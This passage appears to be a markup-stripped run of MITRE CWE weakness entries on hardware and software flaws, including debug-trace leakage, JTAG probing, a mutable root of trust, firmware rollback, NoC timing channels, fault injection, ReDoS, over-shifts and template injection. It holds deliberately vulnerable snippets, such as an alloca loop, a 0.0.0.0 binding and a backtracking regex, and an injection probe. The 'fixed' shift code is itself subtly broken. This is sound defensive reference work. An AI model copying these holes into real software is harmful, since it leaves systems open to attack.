verification of complex System-on-Chip - (SoC) designs, SoC integrators add specific IP blocks that - trace the SoC's internal signals in real-time. This - infrastructure enables observability of the SoC's internal - behavior, validation of its functional design, - and detection of hardware and software bugs. Such tracing - IP blocks collect traces from several sources on the SoC - including the CPU, crypto coprocessors, and on-chip fabrics. Traces collected from these sources are then - aggregated inside trace IP block and forwarded to trace - sinks, such as debug-trace ports that facilitate debugging by - external hardware and software debuggers. - Since - these traces are collected from several security-sensitive - sources, they must be protected against untrusted - debuggers. If they are stored in unprotected memory, an - untrusted software debugger can access these traces and - extract secret information. Additionally, if - security-sensitive traces are not tagged as secure, an - untrusted hardware debugger might access them to extract - confidential information. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Memory - An adversary can read secret values if they are captured in debug traces and stored unsafely. - - - - - Implementation - Tag traces to indicate owner and debugging privilege level (designer, OEM, or end user) needed to access that trace. - - - - - In a SoC, traces generated from sources - include security-sensitive IP blocks such as CPU (with - tracing information such as instructions executed and - memory operands), on-chip fabric (e.g., memory-transfer - signals, transaction type and destination, and - on-chip-firewall-error signals), power-management - IP blocks (e.g., clock- and power-gating signals), and - cryptographic coprocessors (e.g., cryptographic keys and - intermediate values of crypto operations), among - other non-security-sensitive IP blocks including timers - and other functional blocks. The collected traces are - then forwarded to the debug and trace interface used by - the external hardware debugger. - The traces do - not have any privilege level attached to them. All - collected traces can be viewed by any debugger (i.e., SoC - designer, OEM debugger, or end user). - Some of the - traces are SoC-design-house secrets, while some are OEM - secrets. Few are end-user secrets and the rest are - not security-sensitive. Tag all traces with the - appropriate, privilege level at the source. The bits - indicating the privilege level must be immutable in - their transit from trace source to the final, trace - sink. Debugger privilege level must be checked before - providing access to traces. - - - - - - - - - - - - - - Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi - The Intel Corporation - 2020-07-20 - - - - - Sensitive information in clear text on the JTAG - interface may be examined by an eavesdropper, e.g. - by placing a probe device on the interface such as a logic - analyzer, or a corresponding software technique. - - - On a debug configuration with a remote host, - unbeknownst to the host/user, an attacker with physical - access to a target system places a probing device on the - debug interface or software related to the JTAG port e.g. - device driver. While the authorized host/user performs - sensitive operations to the target system, the attacker - uses the probe to collect the JTAG traffic. - - - - - - - - - - - - - - - Architecture and Design - May be introduced when design does not plan for an attacker having physical access while legitimate user is remotely operating device - - - Implementation - - - - - Confidentiality - Read Memory - Read Files or Directories - Read Application Data - High - - - - - Manufacturing - Disable permanently the JTAG interface before releasing the system to untrusted users. - High - - - Architecture and Design - Encrypt all information (traffic) on the JTAG interface using an approved algorithm (such as recommended by NIST). Encrypt the path from inside the chip to the trusted user application. - High - - - Implementation - Block access to secret data from JTAG. - High - - - - - - A TAP accessible register is read/written by a JTAG - based tool, for internal tool use for an authorized - user. The JTAG based tool does not provide access to - this data to an unauthorized user of the tool. - However, the user can connect a probing device and - collect the values directly from the JTAG interface, if - no additional protections are employed. - - - - - - - - - - - Accellera IP Security Assurance (IPSA) Working Group - Accellera Systems Initiative - 2020-10-01 - - - - - The product manages a group of objects or resources and performs a separate memory allocation for each object, but it does not properly limit the total amount of memory that is consumed by all of the combined objects. - - While the product might limit the amount of memory that is allocated in a single operation for a single object (such as a malloc of an array), if an attacker can cause multiple objects to be allocated in separate operations, then this might cause higher total memory consumption than the developer intended, leading to a denial of service. - - - - - - - - - Primary - - - - - - - - - - Stack Exhaustion - When a weakness allocates excessive memory on the stack, it is often described as "stack exhaustion," which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325. - - - - - Implementation - - - - - Availability - DoS: Resource Consumption (Memory) - Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system. - - - - - Implementation - Ensure multiple allocations of the same kind of object are properly tracked - possibly across multiple sessions, requests, or messages. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary. - - - Operation - Run the program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized. - - - - - This example contains a small allocation of stack memory. When the program was first constructed, the number of times this memory was allocated was probably inconsequential and presented no problem. Over time, as the number of objects in the database grow, the number of allocations will grow - eventually consuming the available stack, i.e. "stack exhaustion." An attacker who is able to add elements to the database could cause stack exhaustion more rapidly than assumed by the developer. - - - // Gets the size from the number of objects in a database, which over time can conceivably get very large - int end_limit = get_nmbr_obj_from_db(); - int i; - int *base = NULL; - int *p =base; - for (i = 0; i < end_limit; i++) - { - - *p = alloca(sizeof(int *)); // Allocate memory on the stack - p = *p; // // Point to the next location to be saved - - } - - - Since this uses alloca(), it allocates memory directly on the stack. If end_limit is large enough, then the stack can be entirely consumed. - - - - - CVE-2020-36049 - JavaScript-based packet decoder uses concatenation of many small strings, causing out-of-memory (OOM) condition - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36049 - - - CVE-2019-20176 - Product allocates a new buffer on the stack for each file in a directory, allowing stack exhaustion - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20176 - - - CVE-2013-1591 - Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591 - - - - - - - - CWE Content Team - MITRE - 2020-12-07 - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - A missing immutable root of trust in the hardware results in the ability to bypass secure boot or execute untrusted or adversarial boot code. - - A System-on-Chip (SoC) implements secure boot by verifying or authenticating signed boot code. The signing of the code is achieved by an entity that the SoC trusts. Before executing the boot code, the SoC verifies that the code or the public key with which the code has been signed has not been tampered with. The other data upon which the SoC depends are system-hardware settings in fuses such as whether “Secure Boot is enabled”. These data play a crucial role in establishing a Root of Trust (RoT) to execute secure-boot flows. - One of the many ways RoT is achieved is by storing the code and data in memory or fuses. This memory should be immutable, i.e., once the RoT is programmed/provisioned in memory, that memory should be locked and prevented from further programming or writes. If the memory contents (i.e., RoT) are mutable, then an adversary can modify the RoT to execute their choice of code, resulting in a compromised secure boot. - Note that, for components like ROM, secure patching/update features should be supported to allow authenticated and authorized updates in the field. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - Such issues could be introduced during policy definition, hardware architecture, design, manufacturing, and/or provisioning and can be identified later during testing or system configuration phases. - - - - - Authentication - Authorization - Gain Privileges or Assume Identity - Execute Unauthorized Code or Commands - Modify Memory - High - - - - - Automated Dynamic Analysis - Automated testing can verify that RoT components are immutable. - High - - - Architecture or Design Review - Root of trust elements and memory should be part of architecture and design reviews. - High - - - - - Architecture and Design - When architecting the system, the RoT should be designated for storage in a memory that does not allow further programming/writes. - - - Implementation - During implementation and test, the RoT memory location should be demonstrated to not allow further programming/writes. - - - - - The RoT is stored in memory. This memory can be modified by an adversary. For example, if an SoC implements “Secure Boot” by storing the boot code in an off-chip/on-chip flash, the contents of the flash can be modified by using a flash programmer. Similarly, if the boot code is stored in ROM (Read-Only Memory) but the public key or the hash of the public key (used to enable “Secure Boot”) is stored in Flash or a memory that is susceptible to modifications or writes, the implementation is vulnerable. - In general, if the boot code, key materials and data that enable “Secure Boot” are all mutable, the implementation is vulnerable. - Good architecture defines RoT as immutable in hardware. One of the best ways to achieve immutability is to store boot code, public key or hash of the public key and other relevant data in Read-Only Memory (ROM) or One-Time Programmable (OTP) memory that prevents further programming or writes. - - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-04-25 - - - - - The product assigns the address 0.0.0.0 for a database server, a cloud service/instance, or any computing resource that communicates remotely. - - When a server binds to the address 0.0.0.0, it allows connections from every IP address on the local machine, effectively exposing the server to every possible network. This might be much broader access than intended by the developer or administrator, who might only be expecting the server to be reachable from a single interface/network. - - - - - - - - - - - - - - - System Configuration - - - - - Availability - DoS: Amplification - High - - - - - System Configuration - Assign IP addresses that are not 0.0.0.0. - High - - - System Configuration - Firewall - Unwanted connections to the configured server may be denied through a firewall or other packet filtering measures. - High - - - - - The following code snippet uses 0.0.0.0 in a Puppet script. - - signingserver::instance { - - "nightly-key-signing-server": - - listenaddr => "0.0.0.0", - port => "9100", - code_tag => "SIGNING_SERVER", - - } - - - The Puppet code snippet is used to provision a signing server that will use 0.0.0.0 to accept traffic. However, as 0.0.0.0 is unrestricted, malicious users may use this IP address to launch frequent requests and cause denial of service attacks. - - signingserver::instance { - - "nightly-key-signing-server": - - listenaddr => "127.0.0.1", - port => "9100", - code_tag => "SIGNING_SERVER", - - } - - - - - - - - - - - - - - Akond Rahman - Tennessee Technological University - 2020-09-08 - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions. - - A System-on-Chip (SoC) implements secure boot or verified boot. It might support a security version number, which prevents downgrading the current firmware to a vulnerable version. Once downgraded to a previous version, an adversary can launch exploits on the SoC and thus compromise the security of the SoC. These downgrade attacks are also referred to as roll-back attacks. - The security version number must be stored securely and persistently across power-on resets. A common weakness is that the security version number is modifiable by an adversary, allowing roll-back or downgrade attacks or, under certain circumstances, preventing upgrades (i.e. Denial-of-Service on upgrades). In both cases, the SoC is in a vulnerable state. - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - Such issues could be introduced during hardware architecture and design, and can be identified later during testing or system configuration phases. - - - - - Confidentiality - Integrity - Authentication - Authorization - Other - High - Impact includes roll-back or downgrade to a vulnerable version of the firmware or DoS (prevent upgrades). - - - - - Automated Dynamic Analysis - Mutability of stored security version numbers and programming with older firmware images should be part of automated testing. - High - - - Architecture or Design Review - Anti-roll-back features should be reviewed as part of Architecture or Design review. - High - - - - - Architecture and Design - When architecting the system, security version data should be designated for storage in registers that are either read-only or have access controls that prevent modification by an untrusted agent. - - - Implementation - During implementation and test, security version data should be demonstrated to be read-only and access controls should be validated. - - - - - A new version of firmware is signed with a security version number higher than the previous version. During the firmware update process the SoC checks for the security version number and upgrades the SoC firmware with the latest version. This security version number is stored in persistent memory upon successful upgrade for use across power-on resets. - In general, if the security version number is mutable, the implementation is vulnerable. A mutable security version number allows an adversary to change the security version to a lower value to allow roll-back or to a higher value to prevent future upgrades. - The security version number should be stored in immutable hardware such as fuses, and the writes to these fuses should be highly access-controlled with appropriate authentication and authorization protections. - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-04-25 - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The product contains a component that cannot be updated or patched in order to remove vulnerabilities or significant bugs. - - - If the component is discovered to contain a vulnerability or critical bug, but the issue cannot be fixed using an update or patch, then the product's operator will not be able to protect against the issue. This could leave the product open to attacker exploitation or critical operation failures. - - - In industries such as healthcare, "legacy" - devices can be operated for decades. As a - US task force report notes, "the inability - to update or replace equipment has both - large and small health care delivery - organizations struggle with numerous - unsupported legacy systems that cannot - easily be replaced (hardware, software and - operating systems) with large numbers of - vulnerabilities and few modern - countermeasures." [REF-1197] - - - While hardware can be prone to this weakness, software systems can also be affected, such as when a third-party driver or library is no longer actively maintained or supported but is still critical for the required functionality. - - - - - - - - - - - - - Architecture and Design - Designers might omit capabilities for updating a component due to time pressures to release the product or assumptions about the stability of the component. - - - - - Other - Quality Degradation - Reduce Maintainability - - - - - Requirements - Specify requirements that each component should be updateable. - - - Architecture and Design - Design the product to allow for updating of its components. Consider the infrastructure that might be necessary to support updates. - - - Implementation - Implement the necessary functionality to allow each component to be updated. - - - - - A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes. - The refrigerator has no means of patching and is hacked becoming a spewer of email spam. - The device automatically patches itself and provides considerable more protection against being hacked. - - - - A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch. - - ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code. - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - CWE Content Team - MITRE - 2020-12-03 - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Description, References - - - - - Confidential information stored in memory circuits is readable or recoverable after being cleared or erased. - - Data remanence occurs when stored, memory content is not fully lost after a memory-clear or -erase operation. Confidential memory contents can still be readable through data remanence in the hardware. - Data remanence can occur because of performance optimization or memory organization during 'clear' or 'erase' operations, like a design that allows the memory-organization metadata (e.g., file pointers) to be erased without erasing the actual memory content. To protect against this weakness, memory devices will often support different commands for optimized memory erase and explicit secure erase. - Data remanence can also happen because of the physical properties of memory circuits in use. For example, static, random-access-memory (SRAM) and dynamic, random-access-memory (DRAM) data retention is based on the charge retained in the memory cell, which depends on factors such as power supply, refresh rates, and temperature. - Other than explicit erase commands, self-encrypting, secure-memory devices can also support secure erase through cryptographic erase commands. In such designs, only the decryption keys for encrypted data stored on the device are erased. That is, the stored data are always remnant in the media after a cryptographic erase. However, only the encrypted data can be extracted. Thus, protection against data recovery in such designs relies on the strength of the encryption algorithm. - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Modify Memory - Read Memory - Confidential data are readable to untrusted agent. - - - - - Architecture or Design Review - - - Testing of memory-device contents after clearing or erase commands. - Dynamic analysis of memory contents during device operation to detect specific, confidential assets. - Architecture and design analysis of memory clear and erase operations. - - - - - Dynamic Analysis with Manual Results Interpretation - - - Testing of memory-device contents after clearing or erase commands. - Dynamic analysis of memory contents during device operation to detect specific, confidential assets. - Architecture and design analysis of memory clear and erase operations. - - - - - - - Architecture and Design - - - Support for secure-erase commands that apply multiple cycles of overwriting memory with known patterns and of erasing actual content. - Support for cryptographic erase in self-encrypting, memory devices. - External, physical tools to erase memory such as ultraviolet-rays-based erase of Electrically erasable, programmable, read-only memory (EEPROM). - Physical destruction of media device. This is done for repurposed or scrapped devices that are no longer in use. - - - - - - - Consider a device that uses flash memory for non-volatile-data storage. To optimize flash-access performance or reliable-flash lifetime, the device might limit the number of flash writes/erases by maintaining some state in internal SRAM and only committing changes to flash memory periodically. - The device also supports user reset to factory defaults with the expectation that all personal information is erased from the device after this operation. On factory reset, user files are erased using explicit, erase commands supported by the flash device. - In the given, system design, the flash-file system can support performance-optimized erase such that only the file metadata are erased and not the content. If this optimized erase is used for files containing user data during factory-reset flow, then device, flash memory can contain remanent data from these files. - On device-factory reset, the implementation might not erase these copies, since the file organization has changed and the flash file system does not have the metadata to track all previous copies. - A flash-memory region that is used by a flash-file system should be fully erased as part of the factory-reset flow. This should include secure-erase flow for the flash media such as overwriting patterns multiple times followed by erase. - - - - - CVE-2019-8575 - Firmware Data Deletion Vulnerability in which a base station factory reset might not delete all user information. The impact of this enables a new owner of a used device that has been "factory-default reset" with a vulnerable firmware version can still retrieve, at least, the previous owner's wireless network name, and the previous owner's wireless security (such as WPA2) key. This issue was addressed with improved, data deletion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8575 - - - - - - - - - - - - - Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna - Intel Corporation - 2020-06-10 - - - - - The Network On Chip (NoC) does not isolate or incorrectly isolates its on-chip-fabric and internal resources such that they are shared between trusted and untrusted agents, creating timing channels. - - Typically, network on chips (NoC) have many internal resources that are shared between packets from different trust domains. These resources include internal buffers, crossbars and switches, individual ports, and channels. The sharing of resources causes contention and introduces interference between differently trusted domains, which poses a security threat via a timing channel, allowing attackers to infer data that belongs to a trusted agent. This may also result in introducing network interference, resulting in degraded throughput and latency. - - - - - - - - - Primary - - - - - - - - - - - - "Network-on-chip" (NoC) is a commonly-used term used for hardware interconnect fabrics used by multicore Systems-on-Chip (SoC). Communication between modules on the chip uses packet-based methods, with improved efficiency and scalability compared to bus architectures [REF-1241]. - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Availability - DoS: Resource Consumption (Other) - Varies by Context - Other - Medium - Attackers may infer data that belongs to a trusted agent; the methods used to perform this attack may result in noticeably increased resource consumption. - - - - - Manual Analysis - Providing marker flags to send through the interfaces coupled with examination of which users are able to read or manipulate the flags will help verify that the proper isolation has been achieved and is effective. - Moderate - - - - - Architecture and Design - Implementation - Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents. - - - - - Consider a NoC that implements a one-dimensional mesh network with four nodes. This supports two flows: Flow A from node 0 to node 3 (via node 1 and node 2) and Flow B from node 1 to node 2. Flows A and B share a common link between Node 1 and Node 2. Only one flow can use the link in each cycle. - One of the masters to this NoC implements a cryptographic algorithm (RSA), and another master to the NoC is a core that can be exercised by an attacker. The RSA algorithm performs a modulo multiplication of two large numbers and depends on each bit of the secret key. The algorithm examines each bit in the secret key and only performs multiplication if the bit is 1. This algorithm is known to be prone to timing attacks. Whenever RSA performs multiplication, there is additional network traffic to the memory controller. One of the reasons for this is cache conflicts. - Since this is a one-dimensional mesh, only one flow can use the link in each cycle. Also, packets from the attack program and the RSA program share the output port of the network-on-chip. This contention results in network interference, and the throughput and latency of one flow can be affected by the other flow's demand. - - The attacker runs a loop program on the core they control, and this causes a cache miss in every iteration for the RSA algorithm. Thus, by observing network-traffic bandwidth and timing, the attack program can determine when the RSA algorithm is doing a multiply operation (i.e., when the secret key bit is 1) and eventually extract the entire, secret key. - There may be different ways to fix this particular weakness. - - Implement priority-based arbitration inside the NoC and have dedicated buffers or virtual channels for routing secret data from trusted agents. - - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna - Intel Corporation - 2020-05-23 - - - Hareesh Khattri - Intel Corporation - 2021-10-22 - provided references and background information - - - - - The device is missing or incorrectly implements circuitry or sensors that detect and mitigate the skipping of security-critical CPU instructions when they occur. - - The operating conditions of hardware may change - in ways that cause unexpected behavior to occur, - including the skipping of security-critical CPU - instructions. Generally, this can occur due to - electrical disturbances or when the device operates - outside of its expected conditions. - In practice, application code may contain - conditional branches that are security-sensitive (e.g., - accepting or rejecting a user-provided password). These - conditional branches are typically implemented by a - single conditional branch instruction in the program - binary which, if skipped, may lead to effectively - flipping the branch condition - i.e., causing the wrong - security-sensitive branch to be taken. This affects - processes such as firmware authentication, password - verification, and other security-sensitive decision - points. - Attackers can use fault injection techniques to - alter the operating conditions of hardware so that - security-critical instructions are skipped more - frequently or more reliably than they would in a - "natural" setting. - - - - - - - - Primary - - - - - - - - - - - Architecture and Design - Failure to design appropriate countermeasures to common fault injection techniques can manifest this weakness. - - - Implementation - This weakness can arise if the hardware design incorrectly implements countermeasures to prevent fault injection. - - - - - Confidentiality - Integrity - Authentication - Bypass Protection Mechanism - Alter Execution Logic - Unexpected State - High - Depending on the context, instruction skipping can - have a broad range of consequences related to the - generic bypassing of security critical code. - - - - - Automated Static Analysis - This weakness can be found using automated static analysis once a developer has indicated which code paths are critical to protect. - Moderate - - - Simulation / Emulation - This weakness can be found using automated dynamic analysis. Both emulation of a CPU with instruction skips, as well as RTL simulation of a CPU IP, can indicate parts of the code that are sensitive to faults due to instruction skips. - Moderate - - - Manual Analysis - This weakness can be found using manual (static) analysis. The analyst has security objectives that are matched against the high-level code. This method is less precise than emulation, especially if the analysis is done at the higher level language rather than at assembly level. - Moderate - - - - - Architecture and Design - Design strategies for ensuring safe failure if inputs such as Vcc are modified out of acceptable ranges. - - - Architecture and Design - Design strategies for ensuring safe behavior if instructions attempt to be skipped. - - - Implementation - Ensure that architected fault mitigations are - strong enough in practice. For example, a low power - detection mechanism that takes 50 clock cycles to - trigger at lower voltages may be an insufficient security mechanism if the instruction counter - has already progressed with no other CPU activity occurring. - - - - - A smart card contains authentication credentials that are used as authorization to enter a building. The credentials are only accessible when a correct PIN is presented to the card. - - The card emits the credentials when a voltage anomaly is injected into the power line to the device at a particular time after providing an incorrect PIN to the card, causing the internal program to accept the incorrect PIN. - There are several ways this weakness could be fixed. - - add an internal filter or internal power supply in series with the power supply pin on the device - add sensing circuitry to reset the device if out of tolerance conditions are detected - add additional execution sensing circuits to monitor the execution order for anomalies and abort the action or reset the device under fault conditions - - - - - - - CVE-2019-15894 - fault injection attack bypasses the verification mode, potentially allowing arbitrary code execution. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15894 - - - - Power - - - - - - - - - - - - - - Jasper van Woudenberg - Riscure - 2020-10-14 - - - Jasper van Woudenberg - Riscure - 2021-01-11 - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Functional_Areas, Potential_Mitigations, References - - - Jasper van Woudenberg - Riscure - 2021-10-11 - Provided detection methods and feedback on demonstrative example - - - - - The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles. - Some regular expression engines have a feature called "backtracking". If the token cannot match, the engine "backtracks" to a position that may result in a different token that can match. - Backtracking becomes a weakness if all of these conditions are met: - - The number of possible backtracking attempts are exponential relative to the length of the input. - The input can fail to match the regular expression. - The input can be long enough. - - - Attackers can create crafted inputs that - intentionally cause the regular expression to use - excessive backtracking in a way that causes the CPU - consumption to spike. - - - - - - - - - - - - ReDoS - ReDoS is an abbreviation of "Regular expression Denial of Service". - - - Regular Expression Denial of Service - While this term is attack-focused, this is commonly used to describe the weakness. - - - Catastrophic backtracking - This term is used to describe the behavior of the regular expression as a negative technical impact. - - - - - Implementation - A RegEx can be easy to create and read using unbounded matching characters, but the programmer might not consider the risk of excessive backtracking. - - - High - - - Availability - DoS: Resource Consumption (CPU) - High - - - - - Architecture and Design - Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers. - High - This is one of the few effective solutions when using user-provided regular expressions. - - - System Configuration - Configure backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process. - Moderate - - - Implementation - Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression. - High - - - Implementation - Limit the length of the input that the regular expression will process. - Moderate - - - - - This example attempts to check if an input string is a "sentence" [REF-1164]. - - var test_string = "Bad characters: $@#"; - var bad_pattern = /^(\w+\s?)*$/i; - var result = test_string.search(bad_pattern); - - The regular expression has a vulnerable backtracking clause inside (\w+\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases. - To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \2 which prevents the backtracking. The modified example is: - - var test_string = "Bad characters: $@#"; - var good_pattern = /^((?=(\w+))\2\s?)*$/i; - var result = test_string.search(good_pattern); - - Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx. - - - This example attempts to check if an input string is a "sentence" and is modified for Perl [REF-1164]. - - my $test_string = "Bad characters: \$\@\#"; - my $bdrslt = $test_string; - $bdrslt =~ /^(\w+\s?)*$/i; - - The regular expression has a vulnerable backtracking clause inside (\w+\s?)*$ which can be triggered to cause a Denial of Service by processing particular phrases. - To fix the backtracking problem, backtracking is removed with the ?= portion of the expression which changes it to a lookahead and the \2 which prevents the backtracking. The modified example is: - - my $test_string = "Bad characters: \$\@\#"; - my $gdrslt = $test_string; - $gdrslt =~ /^((?=(\w+))\2\s?)*$/i; - - Note that [REF-1164] has a more thorough (and lengthy) explanation of everything going on within the RegEx. - - - - - CVE-2019-16215 - Markdown parser uses inefficient regex when processing a message, allowing users to cause CPU consumption and delay preventing processing of other messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16215 - - - CVE-2019-6785 - Long string in a version control product allows DoS due to an inefficient regex. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6785 - - - CVE-2019-12041 - Javascript code allows ReDoS via a long string due to excessive backtracking. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12041 - - - CVE-2015-8315 - ReDoS when parsing time. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8315 - - - CVE-2015-8854 - ReDoS when parsing documents. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8854 - - - CVE-2017-16021 - ReDoS when validating URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16021 - - - - - - - - - - - - - - - - - Anonymous External Contributor - 2021-01-17 - - - CWE Content Team - MITRE - 2021-07-20 - updated References - - - - - An unauthorized agent can inject errors into a redundant block to deprive the system of redundancy or put the system in a degraded operating mode. - - To ensure the performance and functional reliability of certain components, hardware designers can implement hardware blocks for redundancy in the case that others fail. This redundant block can be prevented from performing as intended if the design allows unauthorized agents to inject errors into it. In this way, a path with injected errors may become unavailable to serve as a redundant channel. This may put the system into a degraded mode of operation which could be exploited by a subsequent attack. - - - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. - - - Integration - Such issues could be introduced during integration and identified later during Testing or System Configuration phases. - - - - - Integrity - Availability - DoS: Crash, Exit, or Restart - DoS: Instability - Quality Degradation - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Resource Consumption (Other) - Reduce Performance - Reduce Reliability - Unexpected State - - - - - Architecture and Design - Ensure the design does not allow error injection in modes intended for normal run-time operation. Provide access controls on interfaces for injecting errors. - - - Implementation - Disallow error injection in modes which are expected to be used for normal run-time operation. Provide access controls on interfaces for injecting errors. - - - Integration - Add an access control layer atop any unprotected interfaces for injecting errors. - - - - - - - - James Pangburn - Accellera IP Security Assurance (IPSA) Working Group - 2020-07-29 - - - - - An integer value is specified to be shifted by a negative amount or an amount greater than or equal to the number of bits contained in the value causing an unexpected or indeterminate result. - - Specifying a value to be shifted by a negative amount is undefined in various languages. Various computer architectures implement this action in different ways. The compilers and interpreters when generating code to accomplish a shift generally do not do a check for this issue. - Specifying an over-shift, a shift greater than or equal to the number of bits contained in a value to be shifted, produces a result which varies by architecture and compiler. In some languages, this action is specifically listed as producing an undefined result. - - - - - - - - - - - - - - - - Implementation - Adding shifts without properly verifying the size and sign of the shift amount. - - - - - Integrity - DoS: Crash, Exit, or Restart - - - - - Implementation - Implicitly or explicitly add checks and mitigation for negative or over-shift values. - - - - - - A negative shift amount for an x86 or x86_64 shift instruction will produce the number of bits to be shifted by taking a 2's-complement of the shift amount and effectively masking that amount to the lowest 6 bits for a 64 bit shift instruction. - - - unsigned int r = 1 << -5; - - The example above ends up with a shift amount of -5. The hexadecimal value is FFFFFFFFFFFFFFFD which, when bits above the 6th bit are masked off, the shift amount becomes a binary shift value of 111101 which is 61 decimal. A shift of 61 produces a very different result than -5. The previous example is a very simple version of the following code which is probably more realistic of what happens in a real system. - - int choose_bit(int reg_bit, int bit_number_from_elsewhere) - { -   if (NEED_TO_SHIFT) -   { -     reg_bit -= bit_number_from_elsewhere; -   } -   return reg_bit; - } - unsigned int handle_io_register(unsigned int *r) - { - -   unsigned int the_bit = 1 << choose_bit(5, 10); -   *r |= the_bit; -   return the_bit; - } - - - int choose_bit(int reg_bit, int bit_number_from_elsewhere) - { -   if (NEED_TO_SHIFT) -   { -     reg_bit -= bit_number_from_elsewhere; -   } -   return reg_bit; - } - - unsigned int handle_io_register(unsigned int *r) - { -   int the_bit_number = choose_bit(5, 10); -   if ((the_bit_number > 0) && (the_bit_number < 63)) -   { -     unsigned int the_bit = 1 << the_bit_number; -     *r |= the_bit; -   } -   return the_bit; - } - - Note that the good example not only checks for negative shifts and disallows them but also for over-shifts. Not bit operation is done if the shift is out of bounds. Depending on the program, perhaps an error message should be logged. - - - - - CVE-2009-4307 - An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4307 - - - CVE-2012-2100 - An unexpected large value in the ext4 filesystem causes an overshift condition resulting in a divide by zero - fix of CVE-2009-4307. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2100 - - - CVE-2020-8835 - An overshift in a kernel a allowed out of bounds reads and writes resulting in a root takeover. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8835 - - - CVE-2015-1607 - Program is not properly handling signed bitwise left-shifts causing an overlapping memcpy memory range error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1607 - - - CVE-2016-9842 - Compression function improperly executes a signed left shift of a negative integer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9842 - - - CVE-2018-18445 - Some kernels improperly handle right shifts of 32 bit numbers in a 64 bit register. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18445 - - - CVE-2013-4206 - Putty has an incorrectly sized shift value resulting in an overshift. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4206 - - - CVE-2018-20788 - LED driver overshifts under certain conditions resulting in a DoS. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20788 - - - - - CWE Content Team - MITRE - 2021-03-29 - - - - - The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine. - - Many web applications use template engines that allow developers to insert externally-influenced values into free text or messages in order to generate a full web page, document, message, etc. Such engines include Twig, Jinja2, Pug, Java Server Pages, FreeMarker, Velocity, ColdFusion, Smarty, and many others - including PHP itself. Some CMS (Content Management Systems) also use templates. - Template engines often have their own custom command or expression language. If an attacker can influence input into a template before it is processed, then the attacker can invoke arbitrary expressions, i.e. perform injection attacks. For example, in some template languages, an attacker could inject the expression "{{7*7}}" and determine if the output returns "49" instead. The syntax varies depending on the language. - In some cases, XSS-style attacks can work, which can obscure the root cause if the developer does not closely investigate the root cause of the error. - Template engines can be used on the server or client, so both 